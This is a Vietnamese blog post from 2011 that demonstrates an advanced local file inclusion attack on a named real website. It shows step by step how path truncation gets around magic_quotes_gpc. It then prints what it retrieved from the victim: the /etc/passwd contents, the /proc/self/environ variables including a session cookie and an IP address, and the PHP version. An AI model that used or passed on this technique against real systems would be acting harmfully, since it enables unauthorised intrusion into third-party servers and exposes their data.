Trang

Thứ Ba, 5 tháng 4, 2011

advanced LFI magis_quotes_gpc=ON

 PHP filesystem attack vectors

http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ <—- link cho các bạn kham thảo

 nội dung chủ yếu xoay quanh vấn đề :

– Trong php(linux) các bạn include file : /etc/passwd/./././. sẽ trả ra cùng với quả với việc các bạn include : /etc/passwd <——- lợi dụng cái này để bypass blackist trong các hàm ghi file của các editor…

– Trong các hàm liên quan đến file của PHP,ví dụ như hàm include : include(path) thì biến path là đường dẫn đến file cần include,tuy nhiên biến path này cũng có giới hạn số ký tự <—- mình dùng cái này cho các site bị LFI mà không thể dùng null byte (do magic_quotes_gpc = On) để kết thúc chuỗi

Chi tiết victim mình chọn là :

http://cinebox212.co...ex.php?page=abc <— đề nghị các bạn không được phá hoại trang web này,đây mình chỉ demo cho các bạn xem kỹ thuật hoàn toàn không khuyến khích

các bạn có hành động phá hoại

B1 : kiểm tra lỗi

require_once(modules/abc.php) <———— dính chưởng

B2 : kiểm tra xem magic_quotes_gpc on hay off

Warning: require_once(modules/abc\0.php) [function.require-once]: failed to open stream: No such file or directory in /home/cinebox212/domains/cinebox212.com.vn/public_html/classes/webpage.php on line 274

<—————- magic_quotes_gpc = On rồi :”>

B3 : kiểm tra xem limit path của hàm require_once là bao nhiêu

414 Request-URI Too Large <— 2030 thì hơi bị bự

giảm xuống cái : 2020

giảm tiếp vậy

khà khà vậy là ở giữa 2010 và 2015

đoán tiếp vậy

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

<———– Cool exploit thành công

Tiếp theo thử xem mình có đủ quyền để truy cập vào /proc/self/environ hay không

do đường dẫn : /etc/passwd và /proc/self/environ thì cái /proc/self/environ nhiều ký tự hơn nên mình phải xóa bớt /.

B4 : exploit

DOCUMENT_ROOT=/home/cinebox212/domains/cinebox212.com.vn/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7 HTTP_ACCEPT_ENCODING=gzip,deflate HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5 HTTP_CONNECTION=close HTTP_COOKIE=PHPSESSID=9a5b8be46db1c0d5333dda79400713c3 HTTP_HOST=cinebox212.com.vn HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 HTTP_X_FORWARDED_FOR=125.234.5.26 HTTP_X_REAL_IP=125.234.5.26 PATH=/bin:/usr/bin PHPRC=/usr/local/etc/php5/cgi/ QUERY_STRING=page=./../../../../../../../proc/self/environ/

cool

Xong rồi,thử lấy PHP info thông qua LFI xem

PHP Version 5.2.10 <—

0 nhận xét:

Đăng nhận xét